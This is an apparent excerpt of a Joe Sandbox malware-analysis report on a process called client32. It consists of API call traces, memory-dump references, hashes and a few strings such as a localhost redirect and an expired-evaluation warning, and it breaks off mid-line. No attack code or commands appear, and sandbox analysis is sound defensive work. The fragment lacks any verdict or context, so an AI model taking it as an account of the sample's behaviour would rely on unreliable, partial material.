                                                                                                                                                                                                     • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: MessageWindow$FindLongPostSend
                                                                                                                                                                                                    • String ID: IPTip_Main_Window
                                                                                                                                                                                                    • API String ID: 3445528842-293399287
                                                                                                                                                                                                    • Opcode ID: f29157ae41647e7040a7eda695b4ceafee474d21207e05018a777220eed7e0bc
                                                                                                                                                                                                    • Instruction ID: 6ed72df936b24ea30651ffc38d8a948eea9e1772f025cae554d715837251261a
                                                                                                                                                                                                    • Opcode Fuzzy Hash: f29157ae41647e7040a7eda695b4ceafee474d21207e05018a777220eed7e0bc
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 06E08638B81B36B6F33357144C8AFDE79549F05B65F108150F722BE1CDC7689440579A
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • strncmp.MSVCR100(00000000,?,00000000,?,?), ref: 68840C19
                                                                                                                                                                                                    • _errno.MSVCR100(?,?,?), ref: 68840C3F
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR100(?,?,?), ref: 68840C4A
                                                                                                                                                                                                      • Part of subcall function 6885AF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6882B6CF,?,6882C24B,00000003,688074A4,687EA948,0000000C,688074F7,00000001,00000001), ref: 6885AF85
                                                                                                                                                                                                    • _errno.MSVCR100(?,?,?,?), ref: 68840C6E
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR100(?,?,?,?), ref: 68840C79
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4097447824.00000000687D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 687D0000, based on PE: true
                                                                                                                                                                                                     • Associated: 00000007.00000002.4097426862.00000000687D0000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                     • Associated: 00000007.00000002.4097511143.0000000068884000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                     • Associated: 00000007.00000002.4097532016.0000000068886000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                     • Associated: 00000007.00000002.4097551046.0000000068889000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_687d0000_client32.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno_invalid_parameter_noinfo$_invalid_parameterstrncmp
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2244377858-0
                                                                                                                                                                                                    • Opcode ID: 989de4fe64ac7fb5363c1031c15453bbd91eeb5e7c5a7740d970707172cdee37
                                                                                                                                                                                                    • Instruction ID: 6c2192c2ac6939a478f58c089901ad48ea45732cfffdddff9c8d2f6824c885a3
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 989de4fe64ac7fb5363c1031c15453bbd91eeb5e7c5a7740d970707172cdee37
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4B41253281428DDBDB528F68C4447AE3BB0AF21329F944B99E8F05B1E1D7348697D761
APIs
• ??2@YAPAXI@Z.MSVCR100(000000C0,EA013E80), ref: 68826B6A
  • Part of subcall function 687E232B: malloc.MSVCR100(?), ref: 687E2336
• WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 68826C64
  • Part of subcall function 68829684: CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,00000000), ref: 688296E8
  • Part of subcall function 68829684: GetLastError.KERNEL32(?,00000000), ref: 688296F5
  • Part of subcall function 68829684: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000,?,00000000), ref: 6882970D
  • Part of subcall function 68829684: _CxxThrowException.MSVCR100(?,68880C48,00000000,?,00000000), ref: 6882971B
  • Part of subcall function 68829684: GetLastError.KERNEL32(?,00000000), ref: 68829742
  • Part of subcall function 68829684: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000,?,00000000), ref: 6882975A
  • Part of subcall function 68829684: GetLastError.KERNEL32(?,00000000), ref: 6882977D
  • Part of subcall function 68829684: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000,?,00000000), ref: 68829795
  • Part of subcall function 6881865E: _memset.LIBCMT(0000000C,00000000,0000000C,6881869C,00000000,?,?,6882B22E,?,?,?,?,68822C5E,?,?), ref: 68818663
• GetLastError.KERNEL32 ref: 68826BFC
• Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000), ref: 68826C15
• _CxxThrowException.MSVCR100(?,68880C48,00000000), ref: 68826C24
Memory Dump Source
• Source File: 00000007.00000002.4097447824.00000000687D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 687D0000, based on PE: true
• Associated: 00000007.00000002.4097426862.00000000687D0000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000007.00000002.4097511143.0000000068884000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000007.00000002.4097532016.0000000068886000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000007.00000002.4097551046.0000000068889000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_687d0000_client32.jbxd
Similarity
• API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorLast$ExceptionThrow$??2@CreateEventMultipleObjectsWait_memsetmalloc
• String ID:
• API String ID: 2739790103-0
• Opcode ID: a6c1265c29d667641e4d3af432f8439f5d9ba896c793f4aaabb8c71f9853aaea
• Instruction ID: fac3852f05d742fd4f23a12eb433d49092940a8813d0db41983dbcf60e22c751
• Opcode Fuzzy Hash: a6c1265c29d667641e4d3af432f8439f5d9ba896c793f4aaabb8c71f9853aaea
• Instruction Fuzzy Hash: 66417CB1648302DFD710DF58CC85B1ABBE4FB89724F800A29F568D7690DB34E944CBA2
APIs
• __time64.LIBCMT ref: 11061086
  • Part of subcall function 11160477: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,1101D218,00000000,24DE4E77,?,?,?,?,?,1117AD21,000000FF), ref: 11160482
  • Part of subcall function 11160477: __aulldiv.LIBCMT ref: 111604A2
• SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 11061118
• SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 11061122
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 11061143
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 11061151
Memory Dump Source
• Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: Time$FileSystem$Unothrow_t@std@@@__ehfuncinfo$??2@$__aulldiv__time64
• String ID:
• API String ID: 3203075409-0
• Opcode ID: 7e686957ebab2d91ef43d1a78624d3982f8265b352f3fa907e3863f3d2a41bed
• Instruction ID: 9fbe0da520f53b699568b749b3a3eae29a5fc02c94d56d28377b82a7ad20d906
• Opcode Fuzzy Hash: 7e686957ebab2d91ef43d1a78624d3982f8265b352f3fa907e3863f3d2a41bed
• Instruction Fuzzy Hash: A4315A75D1021DAACF04DFE4D841AEEF7B8EF88714F04856AE805B7280EA756A04CBA5
APIs
• _memset.LIBCMT(?,000000FF,00000024), ref: 687F694D
• _get_daylight.MSVCR100(?), ref: 687F6989
• _get_dstbias.MSVCR100(?), ref: 687F699B
• _get_timezone.MSVCR100(?), ref: 687F69AD
• _gmtime64_s.MSVCR100(?,?), ref: 687F69E1
• _errno.MSVCR100 ref: 687F6A07
• _gmtime64_s.MSVCR100(?,?), ref: 687F6A13
• _errno.MSVCR100 ref: 68809DE1
• _invalid_parameter_noinfo.MSVCR100 ref: 68809DEB
• _errno.MSVCR100 ref: 68809DF7
• _invalid_parameter_noinfo.MSVCR100 ref: 68809E01
• _gmtime64_s.MSVCR100(?,?), ref: 68809E3A
• __allrem.LIBCMT ref: 68809EA5
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 68809EC1
• __allrem.LIBCMT ref: 68809ED8
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 68809EF6
• __allrem.LIBCMT ref: 68809F0D
Memory Dump Source
• Source File: 00000007.00000002.4097447824.00000000687D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 687D0000, based on PE: true
• Associated: 00000007.00000002.4097426862.00000000687D0000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000007.00000002.4097511143.0000000068884000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000007.00000002.4097532016.0000000068886000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000007.00000002.4097551046.0000000068889000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_687d0000_client32.jbxd
Similarity
• API ID: __allrem_errno_gmtime64_s$Unothrow_t@std@@@__ehfuncinfo$??2@_invalid_parameter_noinfo$_get_daylight_get_dstbias_get_timezone_memset
• String ID:
• API String ID: 3568092448-0
• Opcode ID: e741142f88ed0d45f64c31f5eb77476c1b73fe3e55a4005a7f74f475dec93dea
• Instruction ID: ae44786244c7a91661b2785ac125492e4293d9845a5009bbeccaae8afc8c811d
• Opcode Fuzzy Hash: e741142f88ed0d45f64c31f5eb77476c1b73fe3e55a4005a7f74f475dec93dea
• Instruction Fuzzy Hash: CC210E76A00606AA9F00DFAECE945AEB7BC9F81214B904477D521E7740E730CB468770
APIs
• GetMessageA.USER32(?,00000000,00000000,00000000), ref: 110250F7
• GetDlgItem.USER32(?,00001399), ref: 11025131
• TranslateMessage.USER32(?), ref: 1102514A
• DispatchMessageA.USER32(?), ref: 11025154
• GetMessageA.USER32(?,00000000,00000000,00000000), ref: 11025196
Memory Dump Source
• Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: Message$DispatchItemTranslate
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1381171329-0
                                                                                                                                                                                                    • Opcode ID: 9bbe141cbcae0986ab8e1a5d19c673565b62793078cbe47edbac0050ed91c493
                                                                                                                                                                                                    • Instruction ID: 4970fc911a0e855f64a3d9e647d9240b716c91892a3758399f36bf61488b9f97
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9bbe141cbcae0986ab8e1a5d19c673565b62793078cbe47edbac0050ed91c493
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6421AE71E0030B6BEB21DA65CC85FAFB3FCAB44708F904469EA1792180FB75E401CB95
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 11023387
                                                                                                                                                                                                    • GetDlgItem.USER32(?,00001399), ref: 110233C1
                                                                                                                                                                                                    • TranslateMessage.USER32(?), ref: 110233DA
                                                                                                                                                                                                    • DispatchMessageA.USER32(?), ref: 110233E4
                                                                                                                                                                                                    • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 11023426
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Message$DispatchItemTranslate
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1381171329-0
                                                                                                                                                                                                    • Opcode ID: 1eedb8004f846199553b9819b36fcc4fba7ec9623a11643e01901e57e73e0ceb
                                                                                                                                                                                                    • Instruction ID: 550a142869b4f1c1193fc2f7bd4fc6518863fc800a3782c30ff24b2ab7768c02
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1eedb8004f846199553b9819b36fcc4fba7ec9623a11643e01901e57e73e0ceb
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0721A175E0430B6BD711DF65CC85BAFB3ACAB48308F808469EA5296280FF74F501CB91
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetFileType.KERNEL32(?,?,?,68858C18,0000000C), ref: 68858B34
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,68858C18,0000000C), ref: 68858B3E
                                                                                                                                                                                                    • __dosmaperr.LIBCMT(00000000,?,?,68858C18,0000000C), ref: 68858B45
                                                                                                                                                                                                    • _errno.MSVCR100(?,?,68858C18,0000000C), ref: 68858B75
                                                                                                                                                                                                    • __doserrno.MSVCR100(?,?,68858C18,0000000C), ref: 68858B80
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4097447824.00000000687D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 687D0000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_687d0000_client32.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ErrorFileLastType__doserrno__dosmaperr_errno
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3203400888-0
                                                                                                                                                                                                    • Opcode ID: e96fc777e2e611abf7f1415a0520c9c671fe8d3e0d31d920cd1b33a2369109ea
                                                                                                                                                                                                    • Instruction ID: f107717a4ba7a340d1609286be81286059161e51e2407b74b93c665a229f0af1
                                                                                                                                                                                                    • Opcode Fuzzy Hash: e96fc777e2e611abf7f1415a0520c9c671fe8d3e0d31d920cd1b33a2369109ea
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5D2145B159120C9FDF518F68C9493AEBB64BF42328F988A46E4708F1E2DB358151DF93
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • Sleep.KERNEL32(000001F4,00000000,?), ref: 1103D0E1
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Sleep
                                                                                                                                                                                                    • String ID: /weblock.htm$:%u$@r$redirect:http://127.0.0.1
                                                                                                                                                                                                    • API String ID: 3472027048-1140565742
                                                                                                                                                                                                    • Opcode ID: 73219fc91a885bec8c3d53282fd7fd25bd90ae77e27c8345a4b14af61fd7c86f
                                                                                                                                                                                                    • Instruction ID: 53e0b3806bd00902e3668edf75962450fe0504f4029adcdddc47de674a55a881
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 73219fc91a885bec8c3d53282fd7fd25bd90ae77e27c8345a4b14af61fd7c86f
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3D11B975F0112EEFFB11DBA4DC40FBEF7A99B41709F0141E9ED1997280DA616D0187A2
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _wcsnicoll_l.MSVCR100(?,?,?,00000000), ref: 687F0AB5
                                                                                                                                                                                                    • _errno.MSVCR100 ref: 6880C7B6
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR100 ref: 6880C7C1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4097447824.00000000687D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 687D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_687d0000_client32.jbxd
Similarity
• API ID: _errno_invalid_parameter_noinfo_wcsnicoll_l
• String ID:
• API String ID: 1358483507-0
• Opcode ID: db7db4b3d559d65b45bd892e583bcb40bfa7a01bb561a55a468ba0db1de8c364
• Instruction ID: c78d4f76e7abea7fec63f66dea73c234c2872ed1958ce1ba71b7624c70a1aba7
• Opcode Fuzzy Hash: db7db4b3d559d65b45bd892e583bcb40bfa7a01bb561a55a468ba0db1de8c364
• Instruction Fuzzy Hash: 12110676540159DBDF344E9DCC4437936E2AB02361FD04D2AF8749A792DB38C840E3B6
APIs
  • Part of subcall function 1103F000: DeleteObject.GDI32(?), ref: 1103F0EB
• CreateRectRgnIndirect.GDI32(?), ref: 1103F168
• CombineRgn.GDI32(?,?,00000000,00000002), ref: 1103F17C
• DeleteObject.GDI32(00000000), ref: 1103F183
• CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 1103F1A6
• CombineRgn.GDI32(00000000,00000000,00000000,00000002), ref: 1103F1BD
Memory Dump Source
• Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: CombineCreateDeleteObjectRect$Indirect
• String ID:
• API String ID: 3044651595-0
• Opcode ID: 1250bfdb64eb9f94442feb870266ab3da7c928c1294f43dacfd40da9a11fa5ee
• Instruction ID: 27b6d86d25d7e193214482d66684a995ae6d2575b2198652133f57a3d860c4fb
• Opcode Fuzzy Hash: 1250bfdb64eb9f94442feb870266ab3da7c928c1294f43dacfd40da9a11fa5ee
• Instruction Fuzzy Hash: 26116031A50702AFE721CE64D888B9AF7ECFB45716F00812EE66992180C770B881CB93
APIs
• GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 6881079E
• GetCurrentProcessId.KERNEL32 ref: 688107AA
• GetCurrentThreadId.KERNEL32 ref: 688107B2
• GetTickCount.KERNEL32 ref: 688107BA
• QueryPerformanceCounter.KERNEL32(?), ref: 688107C6
Memory Dump Source
• Source File: 00000007.00000002.4097447824.00000000687D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 687D0000, based on PE: true
• Associated: 00000007.00000002.4097426862.00000000687D0000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000007.00000002.4097511143.0000000068884000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000007.00000002.4097532016.0000000068886000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000007.00000002.4097551046.0000000068889000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_687d0000_client32.jbxd
Similarity
• API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
• String ID:
• API String ID: 1445889803-0
• Opcode ID: 44a9b8e3babb791ac26add906afda3500939542431725633261c02977db4ac84
• Instruction ID: 4ca444574fdf7edc74cfcf2f10ce050912ffd82d0c680e6810c7e4df450b8505
• Opcode Fuzzy Hash: 44a9b8e3babb791ac26add906afda3500939542431725633261c02977db4ac84
• Instruction Fuzzy Hash: 001170B6D042259BDF109BFCC94899EF7F8EB4A361F920961D465E7600EB719940CB90
APIs
• DecodePointer.KERNEL32(?,?,?,?,?,687EAA03,?,687EAA20,0000000C,687EC551,?,?,687EC455,688070E0,?,687EB911), ref: 687EAA51
• DecodePointer.KERNEL32(?,?,?,?,?,687EAA03,?,687EAA20,0000000C,687EC551,?,?,687EC455,688070E0,?,687EB911), ref: 687EAA5E
• _msize.MSVCR100(00000000,?,?,?,?,?,687EAA03,?,687EAA20,0000000C,687EC551,?,?,687EC455,688070E0), ref: 687EAA7B
  • Part of subcall function 687E25DA: HeapSize.KERNEL32(00000000,00000000,?,687EAA80,00000000,?,?,?,?,?,687EAA03,?,687EAA20,0000000C,687EC551,?), ref: 687E25F4
• EncodePointer.KERNEL32(?,?,?,?,?,?,687EAA03,?,687EAA20,0000000C,687EC551,?,?,687EC455,688070E0), ref: 687EAA97
• EncodePointer.KERNEL32(-00000004,?,?,?,?,?,687EAA03,?,687EAA20,0000000C,687EC551,?,?,687EC455,688070E0), ref: 687EAA9F
• _realloc_crt.MSVCR100(00000000,00000800,?,?,?,?,?,687EAA03,?,687EAA20,0000000C,687EC551,?,?,687EC455,688070E0), ref: 687F283A
• EncodePointer.KERNEL32(00000000,?,?,?,?,?,687EAA03,?,687EAA20,0000000C,687EC551,?,?,687EC455,688070E0), ref: 687F2850
Memory Dump Source
• Source File: 00000007.00000002.4097447824.00000000687D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 687D0000, based on PE: true
• Associated: 00000007.00000002.4097426862.00000000687D0000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000007.00000002.4097511143.0000000068884000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000007.00000002.4097532016.0000000068886000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000007.00000002.4097551046.0000000068889000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_687d0000_client32.jbxd
Similarity
• API ID: Pointer$Encode$Decode$HeapSize_msize_realloc_crt
• String ID:
• API String ID: 765448609-0
• Opcode ID: 7f77484cfba3de844723b0be94e10ba707c01e77873f86cf5bf4f6e1e10a7e46
• Instruction ID: f4cae4d0cb9f9839ff55704d073f4b4e11395d1fa81c4cb5850db61726c352ae
• Opcode Fuzzy Hash: 7f77484cfba3de844723b0be94e10ba707c01e77873f86cf5bf4f6e1e10a7e46
• Instruction Fuzzy Hash: 37F04976510219ABDB019F79CD84489BBDAFB495603514536E509E3211DB71EC41CBE4
APIs
• _errno.MSVCR100(?,687E238F,?,?,?,00000000,?), ref: 688093B8
• _invalid_parameter_noinfo.MSVCR100(?,687E238F,?,?,?,00000000,?), ref: 688093C3
• _errno.MSVCR100(?,?,687E238F,?,?,?,00000000,?), ref: 688093CD
• _errno.MSVCR100 ref: 688093E4
• _invalid_parameter_noinfo.MSVCR100(?,?,687E238F,?,?,?,00000000,?), ref: 688093EF
Memory Dump Source
• Source File: 00000007.00000002.4097447824.00000000687D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 687D0000, based on PE: true
• Associated: 00000007.00000002.4097426862.00000000687D0000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000007.00000002.4097511143.0000000068884000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000007.00000002.4097532016.0000000068886000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000007.00000002.4097551046.0000000068889000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_687d0000_client32.jbxd
Similarity
• API ID: _errno$_invalid_parameter_noinfo
• String ID:
• API String ID: 2819658684-0
• Opcode ID: a6abe8e5a0b4922423dae7bb26b678e5c2fdbbdbe39903aceb750149090a0a8a
• Instruction ID: 47f4688076765927875d133ebfc69b8b4746f039fea3dd9bfc10c9d47ffc1ccf
• Opcode Fuzzy Hash: a6abe8e5a0b4922423dae7bb26b678e5c2fdbbdbe39903aceb750149090a0a8a
• Instruction Fuzzy Hash: 3001A47145060AEBCB211FBCCD487AA3B94AF06338FC15A16F938561E0DBB58560DBF2
APIs
• PostMessageA.USER32(0007036E,00000501,00000000,00000000), ref: 11057461
Strings
• Warning. Eval period expired - ignoring cmd %d (x%x) - idata %x - VistaUI %d, xrefs: 110574EA
• Warning. DoNotify(%d) not processed, xrefs: 1105835B
• Unable to select/accept connection within 10sec, ignoring cmd %d, xrefs: 1105747B
Memory Dump Source
• Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
